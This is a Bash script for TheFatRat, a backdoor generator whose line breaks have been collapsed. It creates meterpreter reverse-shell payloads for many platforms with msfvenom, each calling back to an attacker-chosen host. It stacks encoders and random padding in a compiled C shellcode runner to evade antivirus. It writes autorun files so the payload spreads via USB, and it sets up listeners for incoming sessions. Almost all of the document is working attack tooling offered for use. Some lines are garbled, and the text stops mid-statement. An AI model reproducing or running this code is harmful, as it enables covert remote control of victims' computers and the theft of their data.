#!/bin/bash #============================================================================================================ # THEFATRAT # # Welcome and dont disclaimer # fatrat Author By Edo -maland- # Tested On Kali Linux and Kali sana v.2 # contact me in screetsec@gmail.com # OS Penetration From Indonesia : http://dracos-linux.org/ # Easy tool for generate backdoor with msfvenom ( part of metasploit framework ) # and program compiles a C program with a meterpreter reverse_tcp payload In it that can then be executed on # a windows host Program to create a C program after it is compiled that will bypass most AV #============================================================================================================ #This colour cyan='\e[0;36m' green='\e[0;34m' okegreen='\033[92m' lightgreen='\e[1;32m' white='\e[1;37m' red='\e[1;31m' yellow='\e[1;33m' BlueF='\e[1;34m' #Checking [[ `id -u` -eq 0 ]] || { echo -e "\e[31mMust be root to run script"; exit 1; } resize -s 30 73 clear SERVICE=service; #Check for gcc compiler which i586-mingw32msvc-gcc >/dev/null 2>&1 if [ $? -eq 0 ]; then echo "" COMPILER="i586-mingw32msvc-gcc" else which i686-w64-mingw32-gcc if [ $? -eq 0 ]; then echo "" COMPILER="i686-w64-mingw32-gcc" else echo "" echo -e "\e[01;31m[!]\e[00m Unable to find the required gcc program, install i586-mingw32msvc-gcc or i686-w64-mingw32-gcc (Arch) and try again" echo"" echo "Do you want install mingw tool in the system for fix problem [Y/n]" ; read bebe if [ $bebe == "y" ] ; then apt-get update clear apt-get install mingw32 else exit fi echo "" exit 1 fi fi ######################### #CHECK DEPENDICS ######################### echo -e $cyan" ____ _ _ _ " echo " / ___| |__ ___ ___| | _(_)_ __ __ _ " echo " | | | '_ \ / _ \/ __| |/ / | '_ \ / _\ | " echo " | |___| | | | __/ (__| <| | | | | (_| | _ _ _ " echo " \____|_| |_|\___|\___|_|\_\_|_| |_|\__/ | (_) (_) (_)" echo " |___/ " echo -e $lightgreen'-- -- +=[(c) 2016-2017 | dracos-linux.org | Linuxsec.org | Hacker Indonesia ' echo -e $cyan'-- -- +=[ Author: Screetsec < Edo Maland > ]=+ -- -- ' echo -e " " if [ $(id -u) != "0" ]; then echo [!]::[Check Dependencies]: ; sleep 2 echo [*]::[Check User]: $USER ; sleep 1 echo [x]::[not root]: you need to be [root] to run this script.; echo "" sleep 1 exit else echo [!]::[Check Dependencies]: ; sleep 1 echo [*]::[Check User]: $USER ; fi ping -c 1 google.com > /dev/null 2>&1 if [ "$?" != 0 ] then echo [*]::[Internet Connection]: DONE!; echo [x]::[ warning ]: This Script Needs An Active Internet Connection; sleep 2 else echo [*]::[Internet Connection]: connected!; sleep 2 fi # check if msfvenom and metasploit installation exists if [ -d $find ]; then echo [*]::[msfvenom]: installation found!; else Colors; echo [x]::[warning]:this script require m msfvenom installed to work ; echo [!]::[please wait]: Downloading from network... ; sleep 3 fi sleep 3 clear ############################## #CHECKING POSTGRESQL ############################# if ps ax | grep -v grep | grep postgresql > /dev/null then clear echo -e $cyan":::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::" echo -e $white"::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::" echo -e $cyan":::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::" echo -e $lightgreen" _ _ " echo " ___ ___ _ ____ _(_) ___ ___ _ __ _ _ _ __ _ __ (_)_ __ __ _ " echo " / __|/ _ \ '__\ \ / / |/ __/ _ \ | '__| | | | '_ \| '_ \| | '_ \ / _ |" echo " \__ \ __/ | \ V /| | (_| __/ | | | |_| | | | | | | | | | | | (_| |" echo " |___/\___|_| \_/ |_|\___\___| |_| \__ _|_| |_|_| |_|_|_| |_|\__, |" echo " |___/ " echo -e $cyan":::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::" echo -e $white"::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::" echo -e $cyan":::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::" sleep 2 else clear echo -e $cyan":::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::" echo -e $white"::::::::::::::::::::$white "Metasploit service is not running"$white ::::::::::::::::::" echo -e $cyan":::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::" echo "" echo -e $white " /) " echo " // " echo " (( " echo " // " echo " .-. // .-. " echo " / \- ((=-/ \ " echo " \ \ / " echo " -( ___ ))__)- " echo " .-' // '-. " echo " / (( \ " echo " | * | " echo " \ / " echo " \ |_w_| / " echo " _) \ / (_ " echo " jgs (((---' '---))) " echo -e $cyan":::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::" echo -e $white":::::::::::::::: Wait for starting a Service Postgresql ::::::::::::::::" echo -e $cyan":::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::" service postgresql start read -p "Press [Enter] key to Continue..." clear fi function cmsfvenom() { clear echo -e $okegreen" ===================================================================== " echo -e " | $cyan Create Payload with msfvenom ( must install msfvenom ) $okegreen | " echo -e $okegreen" ===================================================================== " echo -e $red" ___________ " echo -e " | |======[*** $yellow ____ _ " echo -e $red" | $yellow MSFVENOM $red \ $yellow / ___|_ __ ___ ____| |_ ___ _ __ " echo -e $red" |_____________\_______ $yellow | | | '__/ _ \/ _ | __/ _ \| '__|" echo -e $red" |==[msf >]============\ $yellow | |___| | | __/ (_| | || (_) | | " echo -e $red" |______________________\ $yellow \____|_| \___|\____|\__\___/|_| " echo -e $yellow" \(@)(@)(@)(@)(@)(@)(@)/ " echo -e $red" ********************* " echo "" echo -e $okegreen" ===================================================================== " echo -e " | $cyan Created by $red Edo Maland ( Screetsec ) $okegreen | " echo -e $okegreen" ===================================================================== " echo"" echo -e $okegreen " [1] LINUX >> FatRat.ef" echo -e " [2] WINDOWS >> FatRat.exe" echo -e " [3] ANDROID >> FatRat.apk" echo -e " [4] MAC >> FatRat.macho" echo -e " [5] PHP >> FatRat.php" echo -e " [6] ASP >> FatRat.asp" echo -e " [7] JSP >> FatRat.jsp" echo -e " [8] WAR >> FatRat.war" echo -e " [9] Python >> FatRat.py " echo -e " [10] Bash >> FatRat.sh" echo -e " [11] Perl >> FatRat.pl" echo -e " [12] Back to Menu " echo -e " " echo -n -e $red' \033[4mCreator$FATRAT:\033[0m>> '; tput sgr0 #insert your choice read fatrat1 if test $fatrat1 == '1' then cd "output" echo -e $okegreen"" read -p ' Set LHOST IP: ' yourip; read -p ' Set LPORT: ' yourport msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=$yourip LPORT=$yourport -f elf > FatRat.elf echo -e "Shell Saved To output Folder " elif test $fatrat1 == '2' then cd "output" echo -e $okegreen"" read -p ' Set LHOST IP: ' yourip; read -p ' Set LPORT: ' yourport msfvenom -p windows/meterpreter/reverse_tcp LHOST=$yourip LPORT=$yourport -f raw -e x86/shikata_ga_nai -i 10 | msfvenom -a x86 --platform windows -e x86/countdown -i 8 -f raw | msfvenom -a x86 --platform windows -e x86/jmp_call_additive -i 1| msfvenom -a x86 --platform windows -e x86/call4_dword_xor -i 1 | msfvenom -a x86 --platform windows -e x86/shikata_ga_nai -i 1 -f exe -o FatRat.exe echo -e "Shell Saved To output Folder " elif test $fatrat1 == '3' then cd "output" echo -e $okegreen"" read -p ' Set LHOST IP: ' yourip; read -p ' Set LPORT: ' yourport msfvenom -p android/meterpreter/reverse_tcp LHOST=$yourip LPORT=$yourport R > FatRat.apk echo -e "Shell Saved To output Folder " elif test $fatrat1 == '4' then cd "output" echo -e $okegreen"" read -p ' Set LHOST IP: ' yourip; read -p ' Set LPORT: ' yourport msfvenom -p osx/x86/shell_reverse_tcp LHOST=$yourip LPORT=$yourport -f macho > FatRat.macho echo -e "Shell Saved To outputFolder " elif test $fatrat1 == '5' then cd "output" echo -e $okegreen"" read -p ' Set LHOST IP: ' yourip; read -p ' Set LPORT: ' yourport msfvenom -p php/meterpreter_reverse_tcp LHOST=$yourip LPORT=$yourport -f raw > FatRat.php cat FatRat.php | pbcopy && echo ' FatRat.php && pbpaste >> FatRat.php echo -e "Shell Saved To output Folder " elif test $fatrat1 == '6' then cd "output" echo -e $okegreen"" read -p ' Set LHOST IP: ' yourip; read -p ' Set LPORT: ' yourport msfvenom -p windows/meterpreter/reverse_tcp LHOST=$yourip LPORT=$yourport -f asp > FatRat.asp echo -e "Shell Saved To output Folder " elif test $fatrat1 == '7' then cd "output" echo -e $okegreen"" read -p ' Set LHOST IP: ' yourip; read -p ' Set LPORT: ' yourport msfvenom -p java/jsp_shell_reverse_tcp LHOST=$yourip LPORT=$yourport -f raw > FatRat.jsp echo -e "Shell Saved To output Folder " elif test $fatrat1 == '8' then cd "output" echo -e $okegreen"" read -p ' Set LHOST IP: ' yourip; read -p ' Set LPORT: ' yourport msfvenom -p java/jsp_shell_reverse_tcp LHOST=$yourip LPORT=$yourport -f war > FatRat.war echo -e "Shell Saved To output Folder " elif test $fatrat1 == '9' then cd "output" echo -e $okegreen"" read -p ' Set LHOST IP: ' yourip; read -p ' Set LPORT: ' yourport msfvenom -p cmd/unix/reverse_python LHOST=$yourip LPORT=$yourport -f raw > FatRat.py echo -e "Shell Saved To output Folder " elif test $fatrat1 == '10' then cd "output" echo -e $okegreen"" read -p ' Set LHOST IP: ' yourip; read -p ' Set LPORT: ' yourport msfvenom -p cmd/unix/reverse_bash LHOST=$yourip LPORT=$yourport -f raw > FatRat.sh echo -e "Shell Saved To output Folder " elif test $fatrat1 == '11' then cd "output" echo -e $okegreen"" read -p ' Set LHOST IP: ' yourip; read -p ' Set LPORT: ' yourport msfvenom -p cmd/unix/reverse_perl LHOST=$yourip LPORT=$yourport -f raw > FatRat.pl echo -e "Shell Saved To output Folder " elif test $fatrat1 == '12' then clear menu else echo -e " Incorrect Number" fi echo -n -e " Do you want exit? ( Yes / No ) : " read back if [ $back != 'n' ] && [ $back != 'N' ] then clear exit elif [ $back != 'y' ] && [ $back != 'Y' ] then cmsfvenom fi } function clisteners() { clear echo -e $okegreen" ===================================================================== " echo -e " | $cyan Create Listener with metasploit ( must install metasploit ) $okegreen | " echo -e $okegreen" ===================================================================== " echo echo -e $yellow" _ _ _ ^__^ " echo " | | (_)___ ___| |_ ___ _ __ ___ _ __ ___ (oo)\_______ " echo " | | | / __|/ _ \ __/ _ \ '_ \ / _ \ '__/ __| (__)\ )\/\ " echo " | |___| \__ \ __/ || __/ | | | __/ | \__ \ ||----w | " echo " |_____|_|___/\___|\__\___|_| |_|\___|_| |___/ || || " echo "" echo -e $okegreen" ===================================================================== " echo -e " | $cyan Created by $red Edo Maland ( Screetsec ) $okegreen | " echo -e $okegreen" ===================================================================== " echo "" echo -e $okegreen" [1] Liseners for payload linux" echo -e " [2] Liseners for payload Windows" echo -e " [3] Liseners for payload Mac" echo -e " [4] Liseners for payload Android" echo -e " [5] Back to Menu " echo -e " " echo -n -e $red' \033[4mListeners$fatrat:\033[0m>> '; tput sgr0 #insert your choice read fatrat1 if test $fatrat1 == '1' #LINUX then touch "temp/meterpreter_linux.rc" echo use exploit/multi/handler > "temp/meterpreter_linux.rc" echo set PAYLOAD linux/x86/meterpreter/reverse_tcp >> "temp/meterpreter_linux.rc" echo -e $okegreen "" read -p ' Set LHOST IP: ' uservar echo set LHOST $uservar >> "temp/meterpreter_linux.rc" read -p ' Set LPORT: ' uservar echo set LPORT $uservar >> "temp/meterpreter_linux.rc" echo set ExitOnSession false >> "temp/meterpreter_linux.rc" echo exploit -j >> "temp/meterpreter_linux.rc" xterm -e msfconsole -r "temp/meterpreter_linux.rc" & clear elif test $fatrat1 == '2' #Windows then touch "temp/meterpreter_windows.rc" echo use exploit/multi/handler > "temp/meterpreter_windows.rc" echo set PAYLOAD windows/meterpreter/reverse_tcp >> "temp/meterpreter_windows.rc" echo -e $okegreen "" read -p ' Set LHOST IP: ' uservar echo set LHOST $uservar >> "temp/meterpreter_windows.rc" read -p ' Set LPORT: ' uservar echo set LPORT $uservar >> "temp/meterpreter_windows.rc" echo set ExitOnSession false >> "temp/meterpreter_windows.rc" echo exploit -j >> "temp/meterpreter_windows.rc" xterm -e msfconsole -r "temp/meterpreter_windows.rc" & clear elif test $fatrat1 == '3' #Mac then touch "temp/meterpreter_mac.rc" echo use exploit/multi/handler > "temp/meterpreter_mac.rc" echo set PAYLOAD osx/x86/shell_reverse_tcp >> "temp/meterpreter_mac.rc" echo -e $okegreen "" read -p ' Set LHOST IP: ' uservar echo set LHOST $uservar >> "temp/meterpreter_mac.rc" read -p ' Set LPORT: ' uservar echo set LPORT $uservar >> "temp/meterpreter_mac.rc" echo set ExitOnSession false >> "temp/meterpreter_mac.rc" echo exploit -j >> "temp/meterpreter_mac.rc" xterm -e msfconsole -r "temp/meterpreter_mac.rc" & clear elif test $fatrat1 == '4' #Android then touch "temp/meterpreter_android.rc" echo use exploit/multi/handler > "temp/meterpreter_android.rc" echo set PAYLOAD android/meterpreter/reverse_tcp >> "temp/meterpreter_android.rc" echo -e $okegreen "" read -p ' Set LHOST IP: ' uservar echo set LHOST $uservar >> "temp/meterpreter_android.rc" read -p ' Set LPORT: ' uservar echo set LPORT $uservar >> "temp/meterpreter_android.rc" echo set ExitOnSession false >> "temp/meterpreter_android.rc" echo exploit -j >> "temp/meterpreter_android.rc" xterm -e msfconsole -r "temp/meterpreter_android.rc" & clear elif test $fatrat1 == '5' then clear menu else echo -e " Incorrect Number" fi echo -n -e " Do you want exit? ( Yes / No ) : " read back if [ $back != 'n' ] && [ $back != 'N' ] then clear exit elif [ $back != 'y' ] && [ $back != 'Y' ] then cmsfvenom fi } ########################################### MENU AVOID ############################################################ # #recoded AVOID ( AV0id - Metapsloit Payload Anti-Virus Evasion ) to next version - Screetsec ( Edo -maland ) #Released as open source by NCC Group Plc - http://www.nccgroup.com/ #Developed or original code by Daniel Compton, daniel dot compton at nccgroup dot com #Removed Deprecated Commands in favor of MsfVenom by Jason Soto www.jsitech.com #Credit to other A.V. scripts and research by Astr0baby, Vanish3r & Hasan aka inf0g33k , Screetsec # ################################################################################################################ function avoid { clear # User options PAYLOAD="windows/meterpreter/reverse_tcp" # The payload to use MSFVENOM=`which msfvenom` # Path to the msfvenom script MSFCONSOLE=`which msfconsole` # Path to the msfconsole script #Checking [[ `id -u` -eq 0 ]] || { echo -e "\e[31mMust be root to run script"; exit 1; } resize -s 36 73 clear SERVICE=service; #Checking Version VERSION="2.1" # spinner for Metasploit Generator spinlong () { bar=" +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ " barlength=${#bar} i=0 while ((i < 100)); do n=$((i*barlength / 100)) printf "\e[00;32m\r[%-${barlength}s]\e[00m" "${bar:0:n}" ((i += RANDOM%5+2)) sleep 0.02 done } # spinner for random seed generator spinlong2 () { bar=" 01100111001001001110111001101010101010110101001010111001010101010101010" barlength=${#bar} i=0 while ((i < 100)); do n=$((i*barlength / 100)) printf "\e[00;32m\r[%-${barlength}s]\e[00m" "${bar:0:n}" ((i += RANDOM%5+2)) sleep 0.02 done } clear #MENU INTI echo "" echo -e $cyan"========================================================================" echo -e $okegreen" METASPLOIT SHELL A.V. FOR BYPASS AV THIS VERSION $VERSION " echo -e $cyan"========================================================================" echo -e $red"" echo " " echo " ..:::::::::.. " echo " ..:::aad8888888baa:::.. " echo " .::::d:?88888888888?::8b::::. " echo " .:::d8888:?88888888??a888888b:::. " echo " .:::d8888888a8888888aa8888888888b:::. " echo " ::::dP::::::::88888888888::::::::Yb:::: " echo " ::::dP:::::::::Y888888888P:::::::::Yb:::: " echo " ::::d8:::::::::::Y8888888P:::::::::::8b:::: " echo " .::::88::::::::::::Y88888P::::::::::::88::::. " echo " :::::Y8baaaaaaaaaa88P:T:Y88aaaaaaaaaad8P::::: " echo " :::::::Y88888888888P::|::Y88888888888P::::::: " echo " ::::::::::::::::888:::|:::888:::::::::::::::: " echo " :::::::::::::::8888888888888b:::::::::::::: " echo " :::::::::::::::88888888888888:::::::::::::: " echo " :::::::::::::d88888888888888::::::::::::: " echo " ::::::::::::88::88::88:::88:::::::::::: " echo " ::::::::::88::88::88:::88:::::::::: " echo " ::::::::88::88::P::::88:::::::: " echo " ::::::88::88:::::::88:::::: " echo " ::::::::::::::::::: " echo " ::::::::: " echo "" echo -e -$cyan " REMAKE:$red "Screetsec" $cyan( Edo -maland- ) " echo -e " OPEN SOURCE : $red "NCC Group Plc" $cyan( http://www.nccgroup.com ) " echo -e " DEVELOPED : $red Daniel Compton, daniel dot compton at nccgroup dot com " echo -e $cyan"========================================================================" echo -e $okegreen" METASPLOIT SHELL A.V. FOR BYPASS AV THIS VERSION $VERSION " echo -e $cyan"========================================================================" echo -e $cyan"" # Set Output filename echo echo -n -e "TYPE THE DESIRED OUTPUT FILENAME : $okegreen" ; read OUTPUTNAME echo "" echo "" echo -n -e $cyan"TYPE THE DESIRED LABEL FOR THE AUTORUN FILES : $okegreen" ; read LABEL echo "" #Check for Metasploit if [[ "$MSFVENOM" != "" || "$MSFCONSOLE" != "" ]]; then echo "" else echo "" echo -e "\e[01;31m[!]\e[00m Unable to find the required Metasploit program, cant continue. Install and try again" echo -e "\e[01;31m[!]\e[00m If msfpayload, msfencode and msfcli are not in your PATH, edit this script options" echo "" exit 1 fi # Random Msfencode encoding iterations #ITER=`seq 5 10 |sort -R |sort -R | head -1` ITER=`shuf -i 10-20 -n 1` echo "" echo -ne $cyan"TYPE YOUR LHOST : $okegreen" ; read IP echo "" echo "" echo -ne $cyan"TYPE YOUR LPORT : $okegreen" ; read PORT echo "" echo "" echo "" echo -e "\e[01;32m[-]\e[00m Generating Metasploit payload, please wait..." echo "" spinlong #Payload creater $MSFVENOM -p "$PAYLOAD" LHOST="$IP" LPORT="$PORT" EXITFUNC=thread -f raw | $MSFVENOM -e x86/shikata_ga_nai -i $ITER -f raw 2>/dev/null | $MSFVENOM -e x86/jmp_call_additive -i $ITER -a x86 --platform linux -f raw 2>/dev/null | $MSFVENOM -e x86/call4_dword_xor -i $ITER -a x86 --platform win -f raw 2>/dev/null | $MSFVENOM -e x86/shikata_ga_nai -i $ITER -a x86 --platform win -f c > msf.c 2>/dev/null echo "" echo "" # ANOTHER MENU clear echo " " echo -e $cyan"==================================================================" echo -e $okegreen" __ _ _ __ " echo " / _|_ _ ___| | ___ _ ___ _ _ _ __ ___ ___| |/ _| " echo " | |_| | | |/ __| |/ / | | |/ _ \| | | | '__/ __|/ _ \ | |_ " echo " | _| |_| | (__| <| |_| | (_) | |_| | | \__ \ __/ | _| " echo " |_| \____|\___|_|\_\\___ |\___/ \____|_| |___/\___|_|_| " echo " |___/ " echo -e $cyan"==================================================================" echo -e $red"" echo -e $okegreen" |||||||||||||| " echo -e $red" = \ " echo " = | " echo " _= ___/ " echo -e " / _\ ($okegreen"o"$red)\ " echo " | | \ _ \ " echo " | |/ (____) " echo " \__/ / | " echo " / / ___) " echo -e " / \ \ _) $okegreen ) " echo -e $red" \ \ / $okegreen TheFatRat $okegreen ( " echo -e $red" \/ \ \_________/ |\___________________ $okegreen ) " echo -e $red" \/ \ / | $okegreen"===="$red _______)__) " echo -e " \/ \ / __/___ $okegreen"===="$red _/ " echo -e " \/ \ / ($okegreen"O"$red ____)\\_(_/ " echo -e " ($okegreen"O"$red _ ____) " echo -e " ($okegreen"O"$red ____) " echo "" echo -e $cyan"================================================================= " echo "" echo -e $okegreen"" echo " 1. Normal [ 400K payload ] - [ fast compile ] " echo "" echo " 2. Stealth [ 1-2 MB payload ] - [ fast compile ] " echo "" echo " 3. Super Stealth - [ 10-20MB payload ] " echo "" echo " 4. Insane Stealth - [ 50MB payload ] " echo "" echo " 5. Desperate Stealth - [ 100MB payload ] " echo "" echo -ne $cyan "TYPE THE NUMBER IF YOU WANT : " ; read LEVEL echo "" if [ "$LEVEL" = "1" ]; then echo "" echo -e "\e[01;32m[-]\e[00m Normal selected, please wait a few seconds" echo "" echo -e "\e[01;32m[-]\e[00m Generating random seed for padding...please wait" echo "" spinlong2 SEED=$(shuf -i 100000-500000 -n 1) elif [ "$LEVEL" = "2" ]; then echo "" echo -e "\e[01;32m[-]\e[00m Stealth selected, please wait a few seconds" echo "" echo -e "\e[01;32m[-]\e[00m Generating random seed for padding...please wait" echo "" spinlong2 SEED=$(shuf -i 1000000-5000000 -n 1) elif [ "$LEVEL" = "3" ]; then echo "" echo -e "\e[01;32m[-]\e[00m Super Stealth selected, please wait a few seconds" echo "" echo -e "\e[01;32m[-]\e[00m Generating random seed for padding...please wait" echo "" spinlong2 SEED=$(shuf -i 8000000-12000000 -n 1) elif [ "$LEVEL" = "4" ]; then echo "" echo -e "\e[01;32m[-]\e[00m Insane Stealth selected, please wait a few minutes" echo "" echo -e "\e[01;32m[-]\e[00m Generating random seed for padding...please wait" echo "" spinlong2 SEED=$(shuf -i 40000000-60000000 -n 1) elif [ "$LEVEL" = "5" ]; then echo "" echo -e "\e[01;32m[-]\e[00m Desperate Stealth selected, please wait a few minutes" echo "" echo -e "\e[01;32m[-]\e[00m Generating random seed for padding...please wait" echo "" spinlong2 SEED=$(shuf -i 100000000-200000000 -n 1) else echo -e "\e[01;31m[!]\e[00m You didnt select a option, exiting" echo "" exit 1 fi # build the c file ready for compile echo "" echo '#include ' >> build.c echo 'unsigned char padding[]=' >> build.c cat /dev/urandom | tr -dc _A-Z-a-z-0-9 | head -c$SEED > random sed -i 's/$/"/' random sed -i 's/^/"/' random cat random >> build.c echo ';' >> build.c echo 'char payload[] =' >> build.c cat msf.c |grep -v "unsigned" >> build.c echo 'char comment[512] = "";' >> build.c echo 'int main(int argc, char **argv) {' >> build.c echo ' (*(void (*)()) payload)();' >> build.c echo ' return(0);' >> build.c echo '}' >> build.c # gcc compile the exploit ls icons/icon.res >/dev/null 2>&1 if [ $? -eq 0 ]; then $COMPILER -Wall -mwindows icons/icon.res build.c -o "$OUTPUTNAME" else $COMPILER -Wall -mwindows build.c -o "$OUTPUTNAME" fi # check if file built correctly LOCATED=`pwd` ls "$OUTPUTNAME" >/dev/null 2>&1 if [ $? -eq 0 ]; then echo "" echo -e "\e[01;32m[+]\e[00m Your payload has been successfully created and is located here: \e[01;32m"$LOCATED"/"$OUTPUTNAME"\e[00m" else echo "" echo -e "\e[01;31m[!]\e[00m Something went wrong trying to compile the executable, exiting" echo "" exit 1 fi # create autorun files mkdir autorun >/dev/null 2>&1 cp "$OUTPUTNAME" autorun/ >/dev/null 2>&1 cp icons/autorun.ico autorun/ >/dev/null 2>&1 echo "[autorun]" > autorun/autorun.inf echo "open="$OUTPUTNAME"" >> autorun/autorun.inf echo "icon=autorun.ico" >> autorun/autorun.inf echo "label="$LABEL"" >> autorun/autorun.inf echo "" echo -e "\e[01;32m[+]\e[00m I have also created 3 AutoRun files here: \e[01;32m"$LOCATED"/"autorun/"\e[00m - simply copy these files to a CD or USB" # clean up temp files rm build.c >/dev/null 2>&1 rm random >/dev/null 2>&1 rm msf.c >/dev/null 2>&1 rm msfhandler.rc } #### credits function credits { clear echo -e " \033[31m##########################################################################\033[m Credits To \033[31m##########################################################################\033[m" echo echo -e $white "Special thanks to:" echo echo -e $red "Offensive Security for the awesome OS" echo echo -e $green "http://www.offensive-security.com/" echo echo -e $yellow "http://www.kali.org/" echo echo -e $cyan "http://www.kitploit.com/" echo echo -e $white "http://www.linuxsec.org/" echo echo -e $red "Big Thanks to : http://www.github.com/" echo } ################################################################### # MENU FATRAT ################################################################### menu () { clear echo -e $okegreen"" echo -e $okegreen" ____ " echo -e $okegreen" | | " echo -e $okegreen" |____| " echo -e $okegreen" _|____|_ $okegreen _____ _ _____ _ _____ _ " echo -e $okegreen" / $white"ee"\_ $okegreen|_ _| |_ ___| __|___| |_| __ |___| |_ " echo -e $okegreen" .< __O $okegreen | | | | -_| __| .'| _| -| .'| _| " echo -e $okegreen" /\ \.-.' \ $okegreen |_| |_|_|___|__| |___|_| |__|__|___|_| " echo -e $okegreen" J \.|'.\/ \ " echo -e $okegreen" | |_.|. | | | $white"[$okegreen--$white] $cyan " $white"Backdoor" Creator for Remote Acces $white[$okegreen--$white] " echo -e $okegreen" \__.' .|-' / $white"[$okegreen--$white] $cyan" Created by: "$red"Edo Maland (Screetsec) $white[$okegreen--$white] " echo -e $okegreen" L /|o'--'\ $white"[$okegreen--$white] $cyan" Version: $red"1.4" $white[$okegreen--$white] " echo -e $okegreen" | /\/\/\ \ $white"[$okegreen--$white] $cyan" Codename: $red"Xenogenesis" $white[$okegreen--$white] " echo -e $okegreen" J / \.__\ $white"[$okegreen--$white] $cyan" Follow me on Github: $red@Screetsec $white[$okegreen--$white] " echo -e $okegreen" |/ / $white"[$okegreen--$white] $cyan" $white[$okegreen--$white] " echo -e $okegreen" \ .'\. $white"[$okegreen--$white]$white " SELECT AN OPTION TO BEGIN: $white[$okegreen--$white] " echo -e $okegreen" ____)_/\_(___\. $white"[$okegreen--$white] ".___________________________________$white[$okegreen--$white] " echo -e $okegreen" (___._/ \_.___)'$white\_.-----------------------------------------/ " echo echo -e $white " " echo -e $white" [$okegreen"1"$white]$okegreen CREATE BACKDOOR WITH MSFVENOM " echo -e $white" [$okegreen"2"$white]$okegreen CREATE FUD 100% BACKDOOR ( SLOW BUT POWERFULL ) " echo -e $white" [$okegreen"3"$white]$okegreen CREATE FUD BACKDOOR WITH AVOID 1.2 " echo -e $white" [$okegreen"4"$white]$okegreen CREATE A LISTENERS " echo -e $white" [$okegreen"5"$white]$okegreen JUMP TO MSFCONSOLE " echo -e $white" [$okegreen"6"$white]$okegreen SEARCHSPLOIT " echo -e $white" [$okegreen"7"$white]$okegreen HELP " echo -e $white" [$okegreen"8"$white]$okegreen CREDITS " echo -e " " echo -n -e $red' \033[4mScreetsec@Fatrat:\033[0m '; tput sgr0 #insert your choice read fatrat if test $fatrat == '1' then cmsfvenom elif test $fatrat == '2' then chmod +x powerfull.sh xterm ./powerfull.sh elif test $fatrat == '3' then avoid elif test $fatrat == '4' then clisteners elif test $fatrat == '5' then xterm msfconsole elif test $fatrat == '6' then clear echo -e "\033[31mWhat do you want to Hack Today?\033[m" echo -e "\033[31mEnter a search term and hit Enter\033[m" read searchterm gnome-terminal --maximize -t "Seachsploit" --working-directory=WORK_DIR -x bash -c "searchsploit $searchterm; echo -e '\e[32m[-] Close this window when done!\e[0m'; bash" 2>/dev/null & sleep 2 menu elif test $fatrat == '7' then firefox https://github.com/Screetsec/TheFatRat/blob/master/README.md elif test $fatrat == '8' then credits else echo -e " Incorrect Number" fi echo -n -e " Do you want exit? ( Yes / No ) :" read back if [ $back != 'n' ] && [ $back != 'N' ]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]] then clear exit elif [ $back != 'y' ] && [ $back != 'Y' ] then menu fi } ################################################################### # MENU FATRAT ################################################################### clear echo -e $okegreen"" echo -e $okegreen" ____ " echo -e $okegreen" | | " echo -e $okegreen" |____| " echo -e $okegreen" _|____|_ $okegreen _____ _ _____ _ _____ _ " echo -e $okegreen" / $white"ee"\_ $okegreen|_ _| |_ ___| __|___| |_| __ |___| |_ " echo -e $okegreen" .< __O $okegreen | | | | -_| __| .'| _| -| .'| _| " echo -e $okegreen" /\ \.-.' \ $okegreen |_| |_|_|___|__| |___|_| |__|__|___|_| " echo -e $okegreen" J \.|'.\/ \ " echo -e $okegreen" | |_.|. | | | $white"[$okegreen--$white] $cyan " $white"Backdoor" Creator for Remote Acces $white[$okegreen--$white] " echo -e $okegreen" \__.' .|-' / $white"[$okegreen--$white] $cyan" Created by: "$red"Edo Maland (Screetsec) $white[$okegreen--$white] " echo -e $okegreen" L /|o'--'\ $white"[$okegreen--$white] $cyan" Version: $red"1.4" $white[$okegreen--$white] " echo -e $okegreen" | /\/\/\ \ $white"[$okegreen--$white] $cyan" Codename: $red"Xenogenesis" $white[$okegreen--$white] " echo -e $okegreen" J / \.__\ $white"[$okegreen--$white] $cyan" Follow me on Github: $red@Screetsec $white[$okegreen--$white] " echo -e $okegreen" |/ / $white"[$okegreen--$white] $cyan" $white[$okegreen--$white] " echo -e $okegreen" \ .'\. $white"[$okegreen--$white]$white " SELECT AN OPTION TO BEGIN: $white[$okegreen--$white] " echo -e $okegreen" ____)_/\_(___\. $white"[$okegreen--$white] ".___________________________________$white[$okegreen--$white] " echo -e $okegreen" (___._/ \_.___)'$white\_.-----------------------------------------/ " echo echo -e $white " " echo -e $white" [$okegreen"1"$white]$okegreen CREATE BACKDOOR WITH MSFVENOM " echo -e $white" [$okegreen"2"$white]$okegreen CREATE FUD 100% BACKDOOR ( SLOW BUT POWERFULL ) " echo -e $white" [$okegreen"3"$white]$okegreen CREATE FUD BACKDOOR WITH AVOID 1.2 " echo -e $white" [$okegreen"4"$white]$okegreen CREATE A LISTENERS " echo -e $white" [$okegreen"5"$white]$okegreen JUMP TO MSFCONSOLE " echo -e $white" [$okegreen"6"$white]$okegreen SEARCHSPLOIT " echo -e $white" [$okegreen"7"$white]$okegreen HELP " echo -e $white" [$okegreen"8"$white]$okegreen CREDITS " echo -e " " echo -n -e $red' \033[4mScreetsec@Fatrat:\033[0m '; tput sgr0 #insert your choice read fatrat if test $fatrat == '1' then cmsfvenom elif test $fatrat == '2' then chmod +x powerfull.sh xterm ./powerfull.sh elif test $fatrat == '3' then avoid elif test $fatrat == '4' then clisteners elif test $fatrat == '5' then xterm msfconsole elif test $fatrat == '6' then clear echo -e "\033[31mWhat do you want to Hack Today?\033[m" echo -e "\033[31mEnter a search term and hit Enter\033[m" read searchterm gnome-terminal --maximize -t "Seachsploit" --working-directory=WORK_DIR -x bash -c "searchsploit $searchterm; echo -e '\e[32m[-] Close this window when done!\e[0m'; bash" 2>/dev/null & sleep 2 menu elif test $fatrat == '7' then firefox https://github.com/Screetsec/TheFatRat/blob/master/README.md elif test $fatrat == '8' then credits else echo -e " Incorrect Number" fi echo -n -e " Do you want exit? ( Yes / No ) :" read back if [ $back != 'n' ] && [ $back != 'N' 